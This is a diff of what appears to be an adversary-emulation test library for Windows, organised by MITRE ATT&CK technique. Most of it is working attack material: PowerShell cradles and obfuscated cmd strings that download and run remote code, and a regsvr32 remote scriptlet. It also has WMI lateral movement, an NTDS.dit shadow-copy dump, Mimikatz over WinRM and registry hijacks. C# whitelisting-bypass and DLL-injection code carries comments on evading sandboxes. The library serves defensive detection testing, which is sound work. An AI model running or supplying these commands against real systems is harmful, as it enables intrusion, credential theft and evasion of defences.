### Invoke-AppPathBypass
|
||||||
|
|
||||||
|
Note: Windows 10 only
|
||||||
|
|
||||||
|
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
|
||||||
|
|
||||||
|
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
|
||||||
|
|
||||||
|
At prompt, to test:
|
||||||
|
|
||||||
|
C:\Windows\System32\cmd.exe
|
||||||
|
|
||||||
|
### Obfuscated Powershell
|
||||||
|
|
||||||
|
Fancy obfuscation that reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
|
||||||
|
|
||||||
|
cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
|
||||||
|
|
||||||
|
Second test:
|
||||||
|
|
||||||
|
cmd /c "set apple=fish (cars ('http://bit.ly/L3g1tCrad1e).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
|
||||||
|
|
||||||
|
## Powershell Obfuscation
|
||||||
|
|
||||||
|
Provided by @danielbohannon
|
||||||
|
|
||||||
|
[Out-FINcodedCommand](https://github.com/danielbohannon/Out-FINcodedCommand/blob/master/README.md)
|
||||||
|
|
||||||
|
|
||||||
|
Setup:
|
||||||
|
|
||||||
|
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/danielbohannon/Out-FINcodedCommand/master/Out-FINcodedCommand.ps1')
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
Out-FINcodedCommand -command "iex (iwr http://bit.ly/L3g1t).content" -FinalBinary powershell
|
||||||
|
|
||||||
|
Follow prompts to create variables.
|
||||||
|
|
||||||
|
Output:
|
||||||
|
|
||||||
|
cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
|
|
@ -0,0 +1,22 @@
|
||||||
|
## Regsvcs/Regasm
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121)
|
||||||
|
|
||||||
|
### Execution Examples:
|
||||||
|
|
||||||
|
[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
|
||||||
|
|
||||||
|
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
|
||||||
|
|
||||||
|
|
||||||
|
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
|
||||||
|
|
||||||
|
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
|
||||||
|
|
||||||
|
|
||||||
|
## Test Script
|
||||||
|
[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs)
|
|
@ -0,0 +1,16 @@
|
||||||
|
## Regsvr32
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117)
|
||||||
|
|
||||||
|
### Local Scriptlet Execution:
|
||||||
|
|
||||||
|
regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||||
|
|
||||||
|
### Remote Scriptlet Exection:
|
||||||
|
|
||||||
|
regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
|
||||||
|
|
||||||
|
## Test Script
|
||||||
|
|
||||||
|
[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct)
|
||||||
|
|
|
@ -0,0 +1,13 @@
|
||||||
|
## Rundll32
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085)
|
||||||
|
|
||||||
|
### Executes an export inside of a dll.
|
||||||
|
|
||||||
|
rundll32 AllTheThings.dll,EntryPoint
|
||||||
|
|
||||||
|
## Test Script
|
||||||
|
|
||||||
|
[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,12 @@
|
||||||
|
## Trusted Developer Utilities
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127)
|
||||||
|
|
||||||
|
### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx)
|
||||||
|
|
||||||
|
C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj
|
||||||
|
|
||||||
|
## Test Script
|
||||||
|
|
||||||
|
[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj)
|
||||||
|
|
|
@ -0,0 +1,45 @@
|
||||||
|
## Windows Management Instrumentation
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1047](https://attack.mitre.org/wiki/Technique/T1047)
|
||||||
|
|
||||||
|
### Reconnaissance
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic useraccount get /ALL
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic process get caption,executablepath,commandline
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic qfe get description,installedOn /format:csv
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
|
||||||
|
|
||||||
|
### Lateral Movement
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic /NODE: "192.168.0.1" process call create "evil.exe"
|
||||||
|
|
||||||
|
### Privileged Escalation
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
|
|
@ -0,0 +1,15 @@
|
||||||
|
## Windows Admin Shares
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1077](https://attack.mitre.org/wiki/Technique/T1077)
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
cmd.exe /c "net use \\<computer_name>\ipc$ P@ssw0rd1 /u:<domain>\Administrator"
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
cmd.exe /c "net use \\<computer_name>\admin$ P@ssw0rd1 /u:<domain>\Administrator"
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
cmd.exe /c "net use \\<computer_name>\c$ P@ssw0rd1 /u:<domain>\Administrator"
|
|
@ -0,0 +1,33 @@
|
||||||
|
## Windows Remote Management
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1028](https://attack.mitre.org/wiki/Technique/T1028)
|
||||||
|
|
||||||
|
### Enable Windows Remote Management
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
powershell Enable-PSRemoting -Force
|
||||||
|
|
||||||
|
### Powershell lateral movement using the mmc20 application com object
|
||||||
|
|
||||||
|
Input:
|
||||||
|
|
||||||
|
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","<computer_name>")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
|
||||||
|
|
||||||
|
Reference:
|
||||||
|
|
||||||
|
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
|
||||||
|
|
||||||
|
|
||||||
|
### WMIC Process Call Create
|
||||||
|
|
||||||
|
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||||
|
|
||||||
|
### PowerSploit Invoke-Mimikatz WinRM
|
||||||
|
|
||||||
|
powershell-import /local/path/to/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
|
||||||
|
powershell Invoke-Mimikatz -ComputerName TARGET
|
||||||
|
|
||||||
|
Reference:
|
||||||
|
|
||||||
|
https://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,134 @@
|
||||||
|
using System;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Configuration.Install;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.EnterpriseServices;
|
||||||
|
// You will need Visual Studio and UnmanagedExports to build this binary
|
||||||
|
// Install-Package UnmanagedExports -Version 1.2.7
|
||||||
|
using RGiesecke.DllExport;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
Author: Casey Smith, Twitter: @subTee
|
||||||
|
License: BSD 3-Clause
|
||||||
|
|
||||||
|
For Testing Binary Application Whitelisting Controls
|
||||||
|
|
||||||
|
Includes 5 Known Application Whitelisting/ Application Control Bypass Techiniques in One File.
|
||||||
|
1. InstallUtil.exe
|
||||||
|
2. Regsvcs.exe
|
||||||
|
3. Regasm.exe
|
||||||
|
4. regsvr32.exe
|
||||||
|
5. rundll32.exe
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
1.
|
||||||
|
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
|
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
|
2.
|
||||||
|
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
|
||||||
|
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
|
||||||
|
3.
|
||||||
|
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
|
||||||
|
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
|
||||||
|
|
||||||
|
4.
|
||||||
|
regsvr32 /s /u AllTheThings.dll -->Calls DllUnregisterServer
|
||||||
|
regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer
|
||||||
|
5.
|
||||||
|
rundll32 AllTheThings.dll,EntryPoint
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
[assembly: ApplicationActivation(ActivationOption.Server)]
|
||||||
|
[assembly: ApplicationAccessControl(false)]
|
||||||
|
|
||||||
|
public class Program
|
||||||
|
{
|
||||||
|
public static void Main()
|
||||||
|
{
|
||||||
|
Console.WriteLine("Hello From Main...I Don't Do Anything");
|
||||||
|
//Add any behaviour here to throw off sandbox execution/analysts :)
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
public class Thing0
|
||||||
|
{
|
||||||
|
public static void Exec()
|
||||||
|
{
|
||||||
|
ProcessStartInfo startInfo = new ProcessStartInfo();
|
||||||
|
startInfo.FileName = "calc.exe";
|
||||||
|
Process.Start(startInfo);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
[System.ComponentModel.RunInstaller(true)]
|
||||||
|
public class Thing1 : System.Configuration.Install.Installer
|
||||||
|
{
|
||||||
|
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
|
||||||
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
||||||
|
{
|
||||||
|
|
||||||
|
Console.WriteLine("Hello There From Uninstall");
|
||||||
|
Thing0.Exec();
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
[ComVisible(true)]
|
||||||
|
[Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
|
||||||
|
[ClassInterface(ClassInterfaceType.None)]
|
||||||
|
[ProgId("dllguest.Bypass")]
|
||||||
|
[Transaction(TransactionOption.Required)]
|
||||||
|
public class Bypass : ServicedComponent
|
||||||
|
{
|
||||||
|
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
|
||||||
|
|
||||||
|
[ComRegisterFunction] //This executes if registration is successful
|
||||||
|
public static void RegisterClass(string key)
|
||||||
|
{
|
||||||
|
Console.WriteLine("I shouldn't really execute");
|
||||||
|
Thing0.Exec();
|
||||||
|
}
|
||||||
|
|
||||||
|
[ComUnregisterFunction] //This executes if registration fails
|
||||||
|
public static void UnRegisterClass(string key)
|
||||||
|
{
|
||||||
|
Console.WriteLine("I shouldn't really execute either.");
|
||||||
|
Thing0.Exec();
|
||||||
|
}
|
||||||
|
|
||||||
|
public void Exec() { Thing0.Exec(); }
|
||||||
|
}
|
||||||
|
|
||||||
|
class Exports
|
||||||
|
{
|
||||||
|
|
||||||
|
//
|
||||||
|
//
|
||||||
|
//rundll32 entry point
|
||||||
|
[DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
|
||||||
|
public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
|
||||||
|
{
|
||||||
|
Thing0.Exec();
|
||||||
|
}
|
||||||
|
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
|
||||||
|
public static void DllRegisterServer()
|
||||||
|
{
|
||||||
|
Thing0.Exec();
|
||||||
|
}
|
||||||
|
[DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
|
||||||
|
public static void DllUnregisterServer()
|
||||||
|
{
|
||||||
|
Thing0.Exec();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
}
|
|
@ -0,0 +1,18 @@
|
||||||
|
|
||||||
|
REM X86
|
||||||
|
Executing X86 AllTheThings Test
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
|
||||||
|
regsvr32.exe /s /u AllTheThingsx86.dll
|
||||||
|
regsvr32.exe /s AllTheThingsx86.dll
|
||||||
|
rundll32 AllTheThingsx86.dll,EntryPoint
|
||||||
|
|
||||||
|
REM AMD64
|
||||||
|
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
|
||||||
|
regsvr32.exe /s /u AllTheThingsx64.dll
|
||||||
|
regsvr32.exe /s AllTheThingsx64.dll
|
||||||
|
rundll32 AllTheThingsx64.dll,EntryPoint
|
|
@ -0,0 +1,6 @@
|
||||||
|
Windows Registry Editor Version 5.00
|
||||||
|
|
||||||
|
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
|
||||||
|
"AppInit_DLLs"="C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll"
|
||||||
|
"LoadAppInit_DLLs"=dword:00000001
|
||||||
|
"RequireSignedAppInit_DLLs"=dword:00000000
|
|
@ -0,0 +1,22 @@
|
||||||
|
<?XML version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
|
||||||
|
<registration
|
||||||
|
description="AtomicRedTeam"
|
||||||
|
progid="AtomicRedTeam"
|
||||||
|
version="1.00"
|
||||||
|
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||||
|
remotable="true"
|
||||||
|
>
|
||||||
|
</registration>
|
||||||
|
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||||
|
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</scriptlet>
|
|
@ -0,0 +1,23 @@
|
||||||
|
Windows Registry Editor Version 5.00
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
|
||||||
|
@="AtomicRedTeam"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
|
||||||
|
@="{00000001-0000-0000-0000-0000FEEDACDC}"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
|
||||||
|
@="AtomicRedTeam"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
|
||||||
|
@="{00000001-0000-0000-0000-0000FEEDACDC}"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
|
||||||
|
@="AtomicRedTeam"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
|
||||||
|
@="C:\\WINDOWS\\system32\\scrobj.dll"
|
||||||
|
"ThreadingModel"="Apartment"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
|
||||||
|
@="AtomicRedTeam.1.00"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
|
||||||
|
@="https://gist.githubusercontent.com/subTee/91861699acaa1bd0da493c8a79035eb9/raw/bb38d92a543084207e0f14a1f2c4dde15db84659/AtomicRedTeam.sct"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
|
||||||
|
@="AtomicRedTeam"
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
|
||||||
|
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
|
||||||
|
@="{00000001-0000-0000-0000-0000FEEDACDC}"
|
|
@ -0,0 +1,5 @@
|
||||||
|
Windows Registry Editor Version 5.00
|
||||||
|
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
|
||||||
|
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
|
||||||
|
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
|
||||||
|
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
|
|
@ -0,0 +1,3 @@
|
||||||
|
reg import COMHijack.reg
|
||||||
|
certutil.exe -CAInfo
|
||||||
|
reg import COMHijackCleanup.reg
|
|
@ -0,0 +1,84 @@
|
||||||
|
using System;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.Text;
|
||||||
|
|
||||||
|
|
||||||
|
// Source : http://www.codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread
|
||||||
|
// C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe DLLInjection.cs
|
||||||
|
// You will want to change target process, or dll name, depending on architecture.
|
||||||
|
// Sample DLL MessageBox Source From Here: https://github.com/enigma0x3/MessageBox . Thanks Matt ;-)
|
||||||
|
|
||||||
|
|
||||||
|
public class BasicInject
|
||||||
|
{
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
|
||||||
|
public static extern IntPtr GetModuleHandle(string lpModuleName);
|
||||||
|
|
||||||
|
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
|
||||||
|
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
|
||||||
|
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
|
||||||
|
uint dwSize, uint flAllocationType, uint flProtect);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll", SetLastError = true)]
|
||||||
|
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
static extern IntPtr CreateRemoteThread(IntPtr hProcess,
|
||||||
|
IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||||
|
|
||||||
|
// privileges
|
||||||
|
const int PROCESS_CREATE_THREAD = 0x0002;
|
||||||
|
const int PROCESS_QUERY_INFORMATION = 0x0400;
|
||||||
|
const int PROCESS_VM_OPERATION = 0x0008;
|
||||||
|
const int PROCESS_VM_WRITE = 0x0020;
|
||||||
|
const int PROCESS_VM_READ = 0x0010;
|
||||||
|
|
||||||
|
// used for memory allocation
|
||||||
|
const uint MEM_COMMIT = 0x00001000;
|
||||||
|
const uint MEM_RESERVE = 0x00002000;
|
||||||
|
const uint PAGE_READWRITE = 4;
|
||||||
|
|
||||||
|
public static int Main()
|
||||||
|
{
|
||||||
|
// the target process - I'm using a dummy process for this
|
||||||
|
// if you don't have one, open Task Manager and choose wisely
|
||||||
|
Process.Start("notepad");
|
||||||
|
|
||||||
|
Process targetProcess = Process.GetProcessesByName("notepad")[0];
|
||||||
|
|
||||||
|
// geting the handle of the process - with required privileges
|
||||||
|
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
|
||||||
|
|
||||||
|
// searching for the address of LoadLibraryA and storing it in a pointer
|
||||||
|
IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
|
||||||
|
|
||||||
|
// name of the dll we want to inject
|
||||||
|
string dllName = "";
|
||||||
|
if(IntPtr.Size == 8)
|
||||||
|
{
|
||||||
|
dllName = "MessageBox64.dll";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
dllName = "MessageBox32.dll";
|
||||||
|
}
|
||||||
|
// alocating some memory on the target process - enough to store the name of the dll
|
||||||
|
// and storing its address in a pointer
|
||||||
|
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
|
||||||
|
|
||||||
|
// writing the name of the dll there
|
||||||
|
UIntPtr bytesWritten;
|
||||||
|
WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
|
||||||
|
|
||||||
|
// creating a thread that will call LoadLibraryA with allocMemAddress as argument
|
||||||
|
CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
}
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,45 @@
|
||||||
|
using System;
|
||||||
|
using System.Net;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Configuration.Install;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
|
||||||
|
/*
|
||||||
|
Author: Casey Smith, Twitter: @subTee
|
||||||
|
License: BSD 3-Clause
|
||||||
|
|
||||||
|
Step One:
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe InstallUtilBypass.cs
|
||||||
|
|
||||||
|
Step Two:
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.exe
|
||||||
|
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
public class Program
|
||||||
|
{
|
||||||
|
public static void Main()
|
||||||
|
{
|
||||||
|
Console.WriteLine("Hey There From Main()");
|
||||||
|
//Add any behaviour here to throw off sandbox execution/analysts :)
|
||||||
|
//These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
|
||||||
|
//by InstallUtil.exe
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
[System.ComponentModel.RunInstaller(true)]
|
||||||
|
public class Sample : System.Configuration.Install.Installer
|
||||||
|
{
|
||||||
|
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
|
||||||
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
||||||
|
{
|
||||||
|
|
||||||
|
Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed.");
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
|
@ -0,0 +1,47 @@
|
||||||
|
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<!-- This inline task executes c# code. -->
|
||||||
|
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
|
||||||
|
<!-- Feel free to use a more aggressive class for testing. -->
|
||||||
|
<Target Name="Hello">
|
||||||
|
<FragmentExample />
|
||||||
|
<ClassExample />
|
||||||
|
</Target>
|
||||||
|
<UsingTask
|
||||||
|
TaskName="FragmentExample"
|
||||||
|
TaskFactory="CodeTaskFactory"
|
||||||
|
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
|
||||||
|
<ParameterGroup/>
|
||||||
|
<Task>
|
||||||
|
<Using Namespace="System" />
|
||||||
|
<Code Type="Fragment" Language="cs">
|
||||||
|
<![CDATA[
|
||||||
|
Console.WriteLine("Hello From a Code Fragment");
|
||||||
|
]]>
|
||||||
|
</Code>
|
||||||
|
</Task>
|
||||||
|
</UsingTask>
|
||||||
|
<UsingTask
|
||||||
|
TaskName="ClassExample"
|
||||||
|
TaskFactory="CodeTaskFactory"
|
||||||
|
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
|
||||||
|
<Task>
|
||||||
|
<!-- <Reference Include="System.IO" /> Example Include -->
|
||||||
|
<Code Type="Class" Language="cs">
|
||||||
|
<![CDATA[
|
||||||
|
using System;
|
||||||
|
using Microsoft.Build.Framework;
|
||||||
|
using Microsoft.Build.Utilities;
|
||||||
|
|
||||||
|
public class ClassExample : Task, ITask
|
||||||
|
{
|
||||||
|
public override bool Execute()
|
||||||
|
{
|
||||||
|
Console.WriteLine("Hello From a Class.");
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
]]>
|
||||||
|
</Code>
|
||||||
|
</Task>
|
||||||
|
</UsingTask>
|
||||||
|
</Project>
|
|
@ -0,0 +1,50 @@
|
||||||
|
using System;
|
||||||
|
using System.EnterpriseServices;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
|
||||||
|
/*
|
||||||
|
Author: Casey Smith, Twitter: @subTee
|
||||||
|
License: BSD 3-Clause
|
||||||
|
Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
|
From PowerShell.exe
|
||||||
|
|
||||||
|
Step One: Creates a Strong Name Key.
|
||||||
|
